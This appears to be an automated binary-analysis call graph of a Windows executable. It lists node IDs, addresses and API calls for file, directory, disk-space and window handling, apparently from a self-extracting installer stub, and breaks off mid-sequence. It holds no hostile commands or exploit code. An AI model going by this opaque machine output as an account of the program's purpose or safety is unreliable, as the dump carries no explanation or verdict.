8597->8598 8598->8529 8600 4027b6 8599->8600 8601 4027bc ExpandEnvironmentStringsW 8599->8601 8602 401172 2 API calls 8600->8602 8601->8562 8602->8601 8604 4013b5 8603->8604 8606 4013c7 8603->8606 8605 401172 2 API calls 8604->8605 8605->8606 8606->8564 8608 4027cf 8607->8608 8616 4013df 8608->8616 8610 4027da 8610->8571 8612 403e53 ??3@YAXPAX 8611->8612 8615 403e57 8611->8615 8612->8576 8615->8612 8620 4029d8 8615->8620 8624 403303 8615->8624 8617 401423 8616->8617 8618 4013f3 8616->8618 8617->8610 8619 401172 2 API calls 8618->8619 8619->8617 8621 4029ee 8620->8621 8623 402a02 8621->8623 8628 4025a5 memmove 8621->8628 8623->8615 8625 403312 8624->8625 8627 40332b 8625->8627 8629 402a90 8625->8629 8627->8615 8628->8623 8630 402aa0 8629->8630 8631 4013df 2 API calls 8630->8631 8632 402aac 8631->8632 8635 4025a5 memmove 8632->8635 8634 402ab9 8634->8627 8635->8634 8637 401458 2 API calls 8636->8637 8638 403f85 8637->8638 8639 4013a9 2 API calls 8638->8639 8640 403f90 8639->8640 8641 4027c2 2 API calls 8640->8641 8642 403f9d 8641->8642 8643 402771 2 API calls 8642->8643 8644 403faa 8643->8644 8645 403e41 3 API calls 8644->8645 8646 403fba ??3@YAXPAX 8645->8646 8647 4013a9 2 API calls 8646->8647 8648 403fce 8647->8648 8649 4027c2 2 API calls 8648->8649 8650 403fdb 8649->8650 8651 402771 2 API calls 8650->8651 8652 403fe8 8651->8652 8653 403e41 3 API calls 8652->8653 8654 403ff8 ??3@YAXPAX 8653->8654 8655 402771 2 API calls 8654->8655 8656 40400f 8655->8656 8657 403e41 3 API calls 8656->8657 8658 40401e ??3@YAXPAX ??3@YAXPAX 8657->8658 8658->8592 8660 401458 2 API calls 8659->8660 8661 404040 8660->8661 8662 4013a9 2 API calls 8661->8662 8663 40404b 8662->8663 8664 4027c2 2 API calls 8663->8664 8665 404058 8664->8665 8666 402771 2 API calls 8665->8666 8667 404065 8666->8667 8668 403e41 3 API calls 8667->8668 8669 404075 ??3@YAXPAX 8668->8669 8670 4013a9 2 API calls 8669->8670 8671 404089 8670->8671 8672 4027c2 2 API calls 8671->8672 8673 404096 8672->8673 8674 402771 2 API calls 8673->8674 8675 4040a3 8674->8675 8676 403e41 3 API calls 8675->8676 8677 4040b3 ??3@YAXPAX 8676->8677 8678 402771 2 API calls 8677->8678 8679 4040ca 8678->8679 8680 403e41 3 API calls 8679->8680 8681 4040d9 ??3@YAXPAX ??3@YAXPAX 8680->8681 8681->8594 8683 402771 2 API calls 8682->8683 8684 404100 8683->8684 8685 403e41 3 API calls 8684->8685 8686 404111 ??3@YAXPAX 8685->8686 8686->8596 11303 410468 11304 41047d 11303->11304 11307 4104ab 11304->11307 11310 40fea6 11304->11310 11305 40ce0a memmove 11306 4104b9 11305->11306 11307->11305 11311 40ce5c ctype 4 API calls 11310->11311 11312 40feb1 11311->11312 11313 40ce5c ctype 4 API calls 11312->11313 11314 40feb9 11313->11314 11315 40ce5c ctype 4 API calls 11314->11315 11316 40fec1 11315->11316 8701 409f00 8702 40275c 48 API calls 8701->8702 8703 409f0a 8702->8703 8687 40ba20 8689 40ba3d 8687->8689 8688 40ba4c 8689->8688 8692 409f60 8689->8692 8693 409f6a 8692->8693 8697 409f8a 8693->8697 8698 401d13 8693->8698 8696 40275c 48 API calls 8696->8697 8699 401d20 8698->8699 8700 401d1a free 8698->8700 8699->8696 8700->8699 8705 40f227 _EH_prolog 8713 40f25a 8705->8713 8706 40f27c 8707 40f387 8740 4011d1 8707->8740 8709 40f3b1 8714 40f3be ??2@YAPAXI 8709->8714 8710 40f39c 8757 40ef85 8710->8757 8711 40f040 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8711->8713 8713->8706 8713->8707 8713->8711 8715 40f1fd 8 API calls 8713->8715 8717 40ce5c VirtualFree free ??3@YAXPAX ??3@YAXPAX ctype 8713->8717 8750 40f117 8713->8750 8754 40ef63 8713->8754 8733 40f3d8 8714->8733 8715->8713 8717->8713 8719 40f422 8760 40f090 8719->8760 8720 40f485 ??2@YAPAXI 8720->8733 8722 40f090 3 API calls 8722->8733 8726 40ef85 ctype 3 API calls 8726->8733 8728 40f502 8729 40f090 3 API calls 8728->8729 8730 40f527 8729->8730 8731 40ef85 ctype 3 API calls 8730->8731 8731->8706 8733->8706 8733->8719 8733->8720 8733->8722 8733->8726 8733->8728 8734 40f5c5 8733->8734 8763 40f776 ??2@YAPAXI 8733->8763 8765 40faff 8733->8765 8769 40e9ef 8733->8769 8801 40faac 8733->8801 8736 40f090 3 API calls 8734->8736 8737 40f5e4 8736->8737 8738 40ef85 ctype 3 API calls 8737->8738 8738->8706 8741 401235 SendMessageW 8740->8741 8742 4011df GetDiskFreeSpaceExW 8740->8742 8748 40121d 8741->8748 8742->8741 8743 4011f7 8742->8743 8743->8741 8744 402187 19 API calls 8743->8744 8745 401210 8744->8745 8746 408d52 27 API calls 8745->8746 8747 401216 8746->8747 8747->8748 8749 40122e 8747->8749 8748->8709 8748->8710 8749->8741 8751 40f126 8750->8751 8753 40f12c 8750->8753 8751->8713 8752 40f142 _CxxThrowException 8752->8751 8753->8751 8753->8752 8805 40cde2 8754->8805 8817 40cdda 8757->8817 8842 40e4dd 8760->8842 8764 40f7a8 8763->8764 8764->8733 8766 40fb28 8765->8766 8845 40f962 8766->8845 9122 410a40 8769->9122 8772 40ea0c 8772->8733 8774 40eb20 9140 40e6d7 8774->9140 8775 40ea58 ??2@YAPAXI 8784 40ea40 8775->8784 8777 40ea7c ??2@YAPAXI 8777->8784 8784->8774 8784->8775 8784->8777 9195 40e45f ??2@YAPAXI 8784->9195 8803 40fab1 8801->8803 8802 40fad8 8802->8733 8803->8802 8804 40f841 112 API calls 8803->8804 8804->8803 8806 40ce09 8805->8806 8807 40cdea 8805->8807 8806->8713 8809 40cd11 8807->8809 8810 40cda5 8809->8810 8812 40cd24 8809->8812 8810->8806 8811 40cd33 _CxxThrowException 8811->8812 8812->8811 8813 40cd63 ??2@YAPAXI 8812->8813 8814 40cd95 ??3@YAXPAX 8812->8814 8813->8812 8815 40cd79 memcpy 8813->8815 8814->8810 8815->8814 8820 40ccfd 8817->8820 8826 409f10 8820->8826 8829 401cfa 8820->8829 8832 40c7e0 8820->8832 8838 40b880 8820->8838 8821 40cd0e 8827 401d13 free 8826->8827 8828 409f1a 8827->8828 8828->8821 8830 401d01 VirtualFree 8829->8830 8831 401d12 8829->8831 8830->8831 8831->8821 8833 40c805 8832->8833 8834 401d13 free 8833->8834 8835 40c80e 8834->8835 8836 40c830 8835->8836 8837 40c827 ??3@YAXPAX 8835->8837 8836->8821 8837->8836 8839 40b8a6 8838->8839 8840 401d13 free 8839->8840 8841 40b8cc 8840->8841 8841->8821 8843 40cdda ctype 3 API calls 8842->8843 8844 40e4eb 8843->8844 8846 40f967 8845->8846 8847 40f99d 8846->8847 8849 40f841 8846->8849 8847->8733 8850 40f85b 8849->8850 8854 401815 8850->8854 8917 40ca28 8850->8917 8851 40f88f 8851->8846 8855 401831 8854->8855 8861 401827 8854->8861 8920 41017a _EH_prolog 8855->8920 8857 40185e 8964 40cb68 8857->8964 8858 401458 2 API calls 8859 401877 8858->8859 8862 401b51 ??3@YAXPAX 8859->8862 8863 40188c 8859->8863 8861->8851 8867 40cb68 VariantClear 8862->8867 8946 401370 8863->8946 8866 401897 8950 401551 8866->8950 8867->8861 8870 4013a9 2 API calls 8871 4018b6 ??3@YAXPAX 8870->8871 8876 4018c8 8871->8876 8896 401b17 ??3@YAXPAX 8871->8896 8873 40cb68 VariantClear 8873->8861 8874 4018e9 8875 40cb68 VariantClear 8874->8875 8877 4018f1 ??3@YAXPAX 8875->8877 8876->8874 8878 401953 8876->8878 8879 401914 8876->8879 8877->8857 8881 401991 8878->8881 8882 401978 8878->8882 8880 40cb68 VariantClear 8879->8880 8883 401926 ??3@YAXPAX 8880->8883 8885 4019b3 GetLocalTime SystemTimeToFileTime 8881->8885 8886 401999 8881->8886 8884 40cb68 VariantClear 8882->8884 8883->8857 8887 401980 ??3@YAXPAX 8884->8887 8885->8886 8886->8879 8888 4019d0 8886->8888 8889 4019e7 8886->8889 8887->8857 8968 4036f1 lstrlenW 8888->8968 8955 403387 GetFileAttributesW 8889->8955 8893 401b23 GetLastError 8893->8896 8894 401a07 ??2@YAPAXI 8897 401a13 8894->8897 8895 401b19 8895->8893 8896->8873 8992 40ca5c 8897->8992 8900 401afe 8903 40cb68 VariantClear 8900->8903 8901 401a4e GetLastError 8995 40133e 8901->8995 8903->8896 8904 401a60 8905 4036f1 88 API calls 8904->8905 8909 401a6e ??3@YAXPAX 8904->8909 8907 401abb 8905->8907 8907->8909 8910 40ca5c 2 API calls 8907->8910 8908 401a8b 8911 40cb68 VariantClear 8908->8911 8909->8908 8912 401ae0 8910->8912 8913 401a99 ??3@YAXPAX 8911->8913 8914 401ae4 GetLastError 8912->8914 8915 401af5 ??3@YAXPAX 8912->8915 8913->8857 8914->8909 8915->8900 9114 40c95f 8917->9114 8921 410283 8920->8921 8922 4101b5 8920->8922 8923 4101d2 8921->8923 8924 410288 8921->8924 8922->8923 8925 4101c4 8922->8925 8926 41024f 8922->8926 8933 4101f8 8923->8933 9024 40fefb 8923->9024 8929 410292 8924->8929 8932 4101e4 8924->8932 8934 41023d 8924->8934 8927 4101c9 8925->8927 8925->8934 8926->8933 8998 4132af 8926->8998 8938 4101cf 8927->8938 8944 4101fd 8927->8944 8929->8934 8929->8944 8932->8933 9012 40cc18 8932->9012 9007 40cb6d 8933->9007 9020 40cbf3 8934->9020 8937 410265 9001 40cbac 8937->9001 8938->8923 8938->8932 8939 40cb68 VariantClear 8943 40185a 8939->8943 8943->8857 8943->8858 8944->8933 9016 40cc38 8944->9016 8947 401387 8946->8947 8948 401172 2 API calls 8947->8948 8949 401392 8948->8949 8949->8866 8951 40133e 2 API calls 8950->8951 8952 40155f 8951->8952 9039 401429 8952->9039 8954 40156a 8954->8870 8956 4019f3 8955->8956 8957 4033a4 8955->8957 8956->8893 8956->8894 8956->8895 8958 4033b5 8957->8958 8959 4033a8 SetLastError 8957->8959 8958->8956 8960 4033be 8958->8960 8962 4033cc FindFirstFileW 8958->8962 8959->8956 9042 40335a 8960->9042 8962->8960 8963 4033df FindClose CompareFileTime 8962->8963 8963->8956 8963->8960 8967 40cb24 8964->8967 8965 40cb45 VariantClear 8965->8861 8966 40cb5c 8966->8861 8967->8965 8967->8966 8969 402771 2 API calls 8968->8969 8970 403712 8969->8970 8971 401172 2 API calls 8970->8971 8972 403722 8970->8972 8971->8972 8974 403770 GetSystemTimeAsFileTime GetFileAttributesW 8972->8974 8977 403814 8972->8977 9083 401b75 CreateDirectoryW 8972->9083 8975 403785 8974->8975 8976 40378f 8974->8976 8978 403387 22 API calls 8975->8978 8979 401b75 4 API calls 8976->8979 8982 403795 ??3@YAXPAX 8976->8982 8980 403844 8977->8980 8977->8982 8978->8976 8990 4037a2 8979->8990 8981 408dbf 57 API calls 8980->8981 8987 40384e ??3@YAXPAX 8981->8987 8989 403859 8982->8989 8983 4037a7 9089 408dbf 8983->9089 8985 403808 ??3@YAXPAX 8985->8989 8986 4037ba memcpy 8986->8990 8987->8989 8989->8879 8990->8983 8990->8985 8990->8986 8991 401b75 4 API calls 8990->8991 8991->8990 9111 40ca45 8992->9111 8996 401172 2 API calls 8995->8996 8997 401358 8996->8997 8997->8904 8999 40133e 2 API calls 8998->8999 9000 4132bc 8999->9000 9000->8937 9028 40cb96 9001->9028 9004 40cbd1 9005 40cbec ??3@YAXPAX 9004->9005 9006 40cbd6 _CxxThrowException 9004->9006 9005->8933 9006->9005 9008 40cb24 VariantClear 9007->9008 9009 40cb79 9008->9009 9010 40cb92 9009->9010 9011 40cb7d memcpy 9009->9011 9010->8939 9011->9010 9013 40cc21 9012->9013 9014 40cc26 9012->9014 9015 40cb96 VariantClear 9013->9015 9014->8933 9015->9014 9017 40cc41 9016->9017 9018 40cc46 9016->9018 9019 40cb96 VariantClear 9017->9019 9018->8933 9019->9018 9021 40cc01 9020->9021 9022 40cbfc 9020->9022 9021->8933 9023 40cb96 VariantClear 9022->9023 9023->9021 9025 40ff0d 9024->9025 9026 40ff29 9025->9026 9035 40cc5f 9025->9035 9026->8933 9031 40cb24 9028->9031 9030 40cb9e SysAllocString 9030->9004 9030->9005 9034 40cb2c 9031->9034 9032 40cb45 VariantClear 9032->9030 9033 40cb5c 9033->9030 9034->9032 9034->9033 9036 40cc68 9035->9036 9038 40cc6d 9035->9038 9037 40cb96 VariantClear 9036->9037 9037->9038 9038->9026 9040 4013df 2 API calls 9039->9040 9041 401439 9040->9041 9041->8954 9048 402ff3 9042->9048 9044 403363 9045 403384 9044->9045 9046 403368 GetLastError 9044->9046 9045->8956 9047 403373 9046->9047 9047->8956 9049 403000 GetFileAttributesW 9048->9049 9050 402ffc 9048->9050 9051 403011 9049->9051 9052 403016 9049->9052 9050->9044 9051->9044 9053 403034 9052->9053 9054 40301a SetFileAttributesW 9052->9054 9059 402ee6 9053->9059 9055 403030 9054->9055 9056 403027 DeleteFileW 9054->9056 9055->9044 9056->9044 9060 402771 2 API calls 9059->9060 9061 402efd 9060->9061 9062 4027c2 2 API calls 9061->9062 9063 402f0a FindFirstFileW 9062->9063 9064 402fc2 SetFileAttributesW 9063->9064 9078 402f2c 9063->9078 9066 402fe5 ??3@YAXPAX 9064->9066 9067 402fcd RemoveDirectoryW 9064->9067 9065 401370 2 API calls 9065->9078 9069 402fed 9066->9069 9067->9066 9068 402fda ??3@YAXPAX 9067->9068 9068->9069 9069->9044 9071 4027c2 2 API calls 9071->9078 9072 402f91 SetFileAttributesW 9072->9066 9076 402f9a DeleteFileW 9072->9076 9073 402f5c lstrcmpW 9074 402f72 lstrcmpW 9073->9074 9075 402fa5 FindNextFileW 9073->9075 9074->9075 9074->9078 9077 402fbb FindClose 9075->9077 9075->9078 9076->9078 9077->9064 9078->9065 9078->9066 9078->9071 9078->9072 9078->9073 9078->9075 9079 402ee6 2 API calls 9078->9079 9080 401526 9078->9080 9079->9078 9081 4013df 2 API calls 9080->9081 9082 401530 9081->9082 9082->9078 9084 401bb6 9083->9084 9085 401b86 GetLastError 9083->9085 9084->8972 9086 401ba0 GetFileAttributesW 9085->9086 9088 401b95 9085->9088 9086->9084 9086->9088 9087 401b96 SetLastError 9087->8972 9088->9084 9088->9087 9090 402187 19 API calls 9089->9090 9091 408dd3 wvsprintfW 9090->9091 9092 408ea2 9091->9092 9093 408df4 GetLastError FormatMessageW 9091->9093 9096 408cdb 27 API calls 9092->9096 9094 408e22 FormatMessageW 9093->9094 9095 408e37 lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 9093->9095 9094->9092 9094->9095 9100 408cdb 9095->9100 9098 408eae 9096->9098 9098->8982 9101 408d50 ??3@YAXPAX LocalFree 9100->9101 9102 408cea 9100->9102 9101->9098 9103 407c87 4 API calls 9102->9103 9104 408cf9 IsWindow 9103->9104 9105 408d10 IsBadReadPtr 9104->9105 9108 408d22 9104->9108 9105->9108 9106 407ce8 22 API calls 9107 408d48 9106->9107 9110 407a5b ??3@YAXPAX 9107->9110 9108->9106 9110->9101 9112 40ca28 2 API calls 9111->9112 9113 401a46 9112->9113 9113->8900 9113->8901 9119 40c88e 9114->9119 9117 40c993 9117->8851 9118 40c96e CreateFileW 9118->9117 9120 40c898 CloseHandle 9119->9120 9121 40c8a3 9119->9121 9120->9121 9121->9117 9121->9118 9123 410a59 9122->9123 9138 40ea08 9122->9138 9123->9138 9219 410817 9123->9219 9125 410c33 9126 40ce5c ctype 4 API calls 9125->9126 9126->9138 9128 410817 7 API calls 9129 410af5 9128->9129 9129->9125 9130 410b25 9129->9130 9226 40ce5c 9130->9226 9132 410b2e 9133 410bab 9132->9133 9135 4107a2 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 9132->9135 9133->9133 9134 40ce5c ctype 4 API calls 9133->9134 9136 410be7 9134->9136 9135->9132 9137 40ce5c ctype 4 API calls 9136->9137 9137->9138 9138->8772 9139 406eb0 InitializeCriticalSection 9138->9139 9139->8784 9230 40e214 9140->9230 9196 40e46e 9195->9196 9197 4107a2 4 API calls 9196->9197 9198 40e485 9197->9198 9198->8784 9220 40cdda ctype 3 API calls 9219->9220 9221 410823 9220->9221 9222 40cd11 4 API calls 9221->9222 9223 41082d 9222->9223 9224 41083f 9223->9224 9225 40ef63 4 API calls 9223->9225 9224->9125 9224->9128 9225->9223 9227 40ce3b 9226->9227 9228 40ccfd ctype 3 API calls 9227->9228 9229 40ce45 ??3@YAXPAX 9228->9229 9229->9132 9231 40cdda ctype 3 API calls 9230->9231 9232 40e21c 9231->9232 9233 40cdda ctype 3 API calls 9232->9233 9234 40e224 9233->9234 9235 40cdda ctype 3 API calls 9234->9235 9236 40e22c 9235->9236 9497 41382f __set_app_type __p__fmode __p__commode 9498 41389e 9497->9498 9499 4138b2 9498->9499 9500 4138a6 __setusermatherr 9498->9500 9509 4139a6 _controlfp 9499->9509 9500->9499 9502 4138b7 _initterm __getmainargs _initterm 9503 41390b GetStartupInfoA 9502->9503 9505 41393f GetModuleHandleA 9503->9505 9510 406d72 _EH_prolog 9505->9510 9509->9502 9513 405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z 9510->9513 9872 401d21 GetModuleHandleW CreateWindowExW 9513->9872 9516 406d51 MessageBoxA 9518 406d68 exit _XcptFilter 9516->9518 9517 40575f 9517->9516 9519 405779 9517->9519 9520 401458 2 API calls 9519->9520 9521 4057b0 9520->9521 9522 401458 2 API calls 9521->9522 9523 4057bb 9522->9523 9875 4044c6 9523->9875 9528 4027c2 2 API calls 9529 4057f9 9528->9529 9884 402dd6 9529->9884 9531 405802 9898 4043f8 9531->9898 9535 405821 _wtol 9537 405837 9535->9537 9903 404903 #17 9537->9903 9538 4043f8 3 API calls 9539 405867 9538->9539 9540 4058a1 9539->9540 9541 40586d 9539->9541 9543 4043f8 3 API calls 9540->9543 10104 404e99 9541->10104 9544 4058ac 9543->9544 9546 4058b2 9544->9546 9547 4058bd 9544->9547 9545 405874 ??3@YAXPAX 10121 404513 9545->10121 10126 4052a7 9546->10126 9549 4043f8 3 API calls 9547->9549 9553 4058cc 9549->9553 9551 405885 ??3@YAXPAX ??3@YAXPAX 9551->9518 9552 405901 GetModuleFileNameW 9555 405913 9552->9555 9556 405925 9552->9556 9553->9552 9554 401172 2 API calls 9553->9554 9554->9552 9557 408dbf 57 API calls 9555->9557 9558 4043f8 3 API calls 9556->9558 9564 405872 9557->9564 9571 405947 9558->9571 9559 405ae3 9560 4013a9 2 API calls 9559->9560 9561 405af3 9560->9561 9562 4013a9 2 API calls 9561->9562 9563 405b00 9562->9563 9568 405b11 9563->9568 9569 405b9b 9563->9569 9564->9545 9565 405a05 9565->9564 9566 405a38 9565->9566 9570 405a21 _wtol 9565->9570 9567 4043f8 3 API calls 9566->9567 9579 405a97 9567->9579 9573 401370 2 API calls 9568->9573 9929 4023a0 9569->9929 9570->9566 9571->9559 9571->9564 9571->9565 9571->9566 9578 401526 2 API calls 9571->9578 9575 405b35 9573->9575 9577 401370 2 API calls 9575->9577 9576 401370 2 API calls 9580 405bab ??2@YAPAXI 9576->9580 9581 405b4b 9577->9581 9578->9571 9579->9559 9582 404a97 2 API calls 9579->9582 9583 405bb7 9580->9583 9585 405b68 9581->9585 9586 405b58 calloc 9581->9586 9584 405ac8 9582->9584 9932 40c9d7 9583->9932 9584->9559 9587 4013a9 2 API calls 9584->9587 9588 4013a9 2 API calls 9585->9588 9586->9585 9587->9559 9589 405b75 9588->9589 9591 402187 19 API calls 9589->9591 9593 405b7c 9591->9593 9596 4027c2 2 API calls 9593->9596 9594 405be4 9597 408dbf 57 API calls 9594->9597 9595 405c0a 9935 402823 9595->9935 9599 405b85 calloc 9596->9599 9597->9564 9599->9569 9602 405c1f 9603 405c25 9602->9603 9604 405c49 9602->9604 9606 408dbf 57 API calls 9603->9606 9605 405cdb 9604->9605 9608 4043f8 3 API calls 9604->9608 9609 40cdda ctype 3 API calls 9605->9609 9607 405c2d ??3@YAXPAX 9606->9607 9607->9564 9610 405c60 9608->9610 9611 405ce3 9609->9611 9610->9605 9620 405c66 9610->9620 9612 405d08 9611->9612 10160 403400 9611->10160 9614 405d11 9612->9614 9615 405cbf ??3@YAXPAX 9612->9615 9618 405d82 9614->9618 9619 405d1d wsprintfW 9614->9619 9625 401458 2 API calls 9614->9625 9628 401370 ??2@YAPAXI ??3@YAXPAX 9614->9628 9630 402187 19 API calls 9614->9630 10189 4032d9 ??2@YAPAXI 9614->10189 10195 40269a ??3@YAXPAX ??3@YAXPAX 9614->10195 9615->9564 9617 405cfd ??3@YAXPAX 9617->9564 9969 404b06 9618->9969 9622 401458 2 API calls 9619->9622 9620->9615 10134 4054c1 9620->10134 9622->9614 9624 405c95 9624->9615 9626 405c9b 9624->9626 9625->9614 9627 408dbf 57 API calls 9626->9627 9629 405ca3 ??3@YAXPAX 9627->9629 9628->9614 9629->9564 9630->9614 9631 406006 9632 404b06 26 API calls 9631->9632 9633 406015 9632->9633 9635 40619d 9633->9635 10221 40244e AllocateAndInitializeSid 9633->10221 10028 4026b0 9635->10028 9640 40624e 10031 4045f4 9640->10031 9642 40603a 9645 401458 2 API calls 9642->9645 9643 402771 2 API calls 9686 4061b5 9643->9686 9647 406042 9645->9647 9650 401458 2 API calls 9647->9650 9648 4062e1 CoInitialize 9656 4026b0 lstrcmpW 9648->9656 9649 406275 9652 4026b0 lstrcmpW 9649->9652 9653 40604a GetCommandLineW 9650->9653 9655 406284 9652->9655 9657 404a97 2 API calls 9653->9657 9654 406250 ??3@YAXPAX 9654->9640 9658 406294 9655->9658 9662 402187 19 API calls 9655->9662 9659 406307 9656->9659 9660 40605a 9657->9660 10230 4041ab 9658->10230 9663 40631b 9659->9663 9666 401370 2 API calls 9659->9666 9664 402771 2 API calls 9660->9664 9661 401458 ??2@YAPAXI ??3@YAXPAX 9661->9686 9662->9658 9668 4041c4 16 API calls 9663->9668 9667 406065 9664->9667 9666->9663 9672 4048a9 2 API calls 9667->9672 9673 406321 9668->9673 9670 4013a9 2 API calls 9670->9686 9671 40421b lstrlenW lstrlenW _wcsnicmp 9679 405d8b 9671->9679 9675 406083 9672->9675 9676 4026b0 lstrcmpW 9673->9676 9674 407ce8 22 API calls 9677 4062b7 9674->9677 9680 4048c7 2 API calls 9675->9680 9681 406330 9676->9681 10233 407a5b ??3@YAXPAX 9677->10233 9678 401370 2 API calls 9678->9686 9679->9631 9679->9671 9703 405f6a _wtol 9679->9703 9730 40614a ??3@YAXPAX 9679->9730 10196 404d50 9679->10196 10207 40464b 9679->10207 9687 406090 9680->9687 9683 406344 9681->9683 9684 406337 _wtol 9681->9684 9688 40636a 9683->9688 10234 408f81 9683->10234 9684->9683 9685 4062c2 ??3@YAXPAX 9685->9564 9686->9640 9686->9643 9686->9654 9686->9661 9686->9670 9686->9678 9689 4032d9 7 API calls 9686->9689 10229 40269a ??3@YAXPAX ??3@YAXPAX 9686->10229 9690 4048c7 2 API calls 9687->9690 9693 40637e 9688->9693 9695 406355 ??3@YAXPAX 9688->9695 10250 408eb4 9688->10250 9689->9686 9691 40609d 9690->9691 10224 4048e5 9691->10224 9705 401458 2 API calls 9693->9705 9709 406503 ??3@YAXPAX 9693->9709 9710 4063bc GetKeyState 9693->9710 9714 406563 9693->9714 9715 401370 ??2@YAPAXI ??3@YAXPAX 9693->9715 9716 4026b0 lstrcmpW 9693->9716 9722 401526 ??2@YAPAXI ??3@YAXPAX 9693->9722 9731 406520 9693->9731 9733 406553 ??3@YAXPAX ??3@YAXPAX 9693->9733 9734 4064f8 ??3@YAXPAX 9693->9734 10277 408461 9693->10277 10290 4084df 9693->10290 9695->9688 9699 40622b ??3@YAXPAX 9701 4026b0 lstrcmpW 9699->9701 9700 401551 2 API calls 9702 4060b7 9700->9702 9701->9686 9704 4013a9 2 API calls 9702->9704 9703->9679 9707 4060c3 7 API calls 9704->9707 9705->9693 9708 404f67 9 API calls 9707->9708 9711 40610c 9708->9711 9709->9564 9710->9693 9712 406116 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9711->9712 9713 406167 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9711->9713 9712->9564 9713->9545 9713->9564 9717 406599 9714->9717 9718 40656b 9714->9718 9715->9693 9716->9693 9720 40133e 2 API calls 9717->9720 10037 404545 9718->10037 9723 4065a7 9720->9723 9722->9693 9727 4041c4 16 API calls 9723->9727 9726 4013a9 2 API calls 9728 406588 ??3@YAXPAX 9726->9728 9729 4065b0 9727->9729 9738 4065d0 9728->9738 9732 4065c1 ??3@YAXPAX 9729->9732 9736 4013a9 2 API calls 9729->9736 9730->9564 9735 408dbf 57 API calls 9731->9735 9732->9738 9733->9564 9734->9693 9737 40652c ??3@YAXPAX ??3@YAXPAX 9735->9737 9736->9732 9737->9564 9739 40661a 9738->9739 9740 40660d 9738->9740 10298 40851f 9739->10298 10050 40172c ??2@YAPAXI 9740->10050 9743 406616 9744 406657 9743->9744 9745 40662c 9743->9745 9746 4045f4 22 API calls 9744->9746 10306 4044b0 9745->10306 9747 40665c 9746->9747 9750 406c4d 9747->9750 9751 401458 2 API calls 9747->9751 9753 406cc5 9750->9753 9754 4026b0 lstrcmpW 9750->9754 9752 40667a 9751->9752 9797 40668d 9752->9797 10310 404a41 9752->10310 9756 406d08 ??3@YAXPAX ??3@YAXPAX 9753->9756 9762 4026b0 lstrcmpW 9753->9762 9760 406c7e 9754->9760 9757 406d21 9756->9757 9758 406d27 ??3@YAXPAX 9756->9758 9757->9758 9761 404513 4 API calls 9758->9761 9759 401458 ??2@YAPAXI ??3@YAXPAX 9759->9797 9760->9753 10377 404497 9760->10377 9763 406d38 ??3@YAXPAX ??3@YAXPAX 9761->9763 9764 406ce4 9762->9764 9763->9518 9764->9756 9767 406cf1 9764->9767 9771 40133e 2 API calls 9767->9771 9768 4066bc 9772 406ae3 ??3@YAXPAX ??3@YAXPAX 9768->9772 9773 4066c9 9768->9773 9769 4026b0 lstrcmpW 9769->9797 9770 407ce8 22 API calls 9775 406cba 9770->9775 9777 406d00 9771->9777 9776 406bec 9772->9776 9774 4048c7 2 API calls 9773->9774 9778 4066e5 9774->9778 10380 407a5b ??3@YAXPAX 9775->10380 9781 406c44 ??3@YAXPAX 9776->9781 9786 4045f4 22 API calls 9776->9786 10381 405304 9777->10381 9784 4048c7 2 API calls 9778->9784 9779 406729 9785 401370 2 API calls 9779->9785 9781->9750 9788 4066f2 9784->9788 9789 406732 9785->9789 9787 406bfb 9786->9787 10367 404dae 9787->10367 9791 4013a9 2 API calls 9788->9791 9793 4041f8 20 API calls 9789->9793 9796 4066fe ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9791->9796 9792 406b49 ??3@YAXPAX ??3@YAXPAX 9792->9776 9810 40673b 9793->9810 9794 401370 2 API calls 9794->9797 9795 406c14 SetCurrentDirectoryW 9798 404dae 4 API calls 9795->9798 9799 406725 9796->9799 9800 406afa 9796->9800 9797->9759 9797->9768 9797->9769 9797->9779 9797->9792 9797->9794 9801 401526 2 API calls 9797->9801 9802 406c3c 9798->9802 9799->9779 9803 4044b0 16 API calls 9800->9803 9804 4067c9 ??3@YAXPAX ??3@YAXPAX 9801->9804 9805 4044b0 16 API calls 9802->9805 9806 406aff 9803->9806 9804->9797 9805->9781 9807 408dbf 57 API calls 9806->9807 9808 406b08 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9807->9808 9808->9564 9809 406b3e 9808->9809 9809->9564 9811 406868 _wtol 9810->9811 9812 404255 lstrlenW lstrlenW _wcsnicmp 9810->9812 9813 40692c 9810->9813 9811->9810 9812->9810 9814 406935 9813->9814 9815 406987 9813->9815 9816 40695a 9814->9816 9817 40693b 9814->9817 9818 4013a9 2 API calls 9815->9818 9819 401370 2 API calls 9816->9819 9820 401370 2 API calls 9817->9820 9821 406985 9818->9821 9823 406958 9819->9823 9822 406946 9820->9822 9824 4027c2 2 API calls 9821->9824 9826 4027c2 2 API calls 9822->9826 9825 4026b0 lstrcmpW 9823->9825 9827 406999 9824->9827 9829 40696f 9825->9829 9828 40694f 9826->9828 9830 401458 2 API calls 9827->9830 9831 4027c2 2 API calls 9828->9831 9829->9827 9834 4027c2 2 API calls 9829->9834 9832 4069a1 9830->9832 9831->9823 9833 404a97 2 API calls 9832->9833 9835 4069ae 9833->9835 9834->9821 9836 402771 2 API calls 9835->9836 9837 4069b9 9836->9837 9838 4041f8 20 API calls 9837->9838 9839 4069c2 9838->9839 9840 406a9d 9839->9840 10067 40241d 9839->10067 9841 406bcb ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9840->9841 9843 406ab1 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9840->9843 9841->9776 9843->9772 9844 4069d7 9844->9840 9845 4069f1 9844->9845 9847 4027c2 2 API calls 9844->9847 9846 4041f8 20 API calls 9845->9846 9848 406a09 9846->9848 9847->9845 9849 406a10 9848->9849 9850 406a7f 9848->9850 10076 4048a9 9849->10076 10319 40503e 9850->10319 9854 406a8d 9855 406b68 SetLastError 9854->9855 9856 406a98 9854->9856 9859 406b6f 9855->9859 10364 4023b5 9856->10364 9861 408dbf 57 API calls 9859->9861 9863 406b79 9861->9863 9862 401551 2 API calls 9864 406a45 ??3@YAXPAX ??3@YAXPAX 9862->9864 9865 4044b0 16 API calls 9863->9865 10086 404f67 9864->10086 9867 406b7e 7 API calls 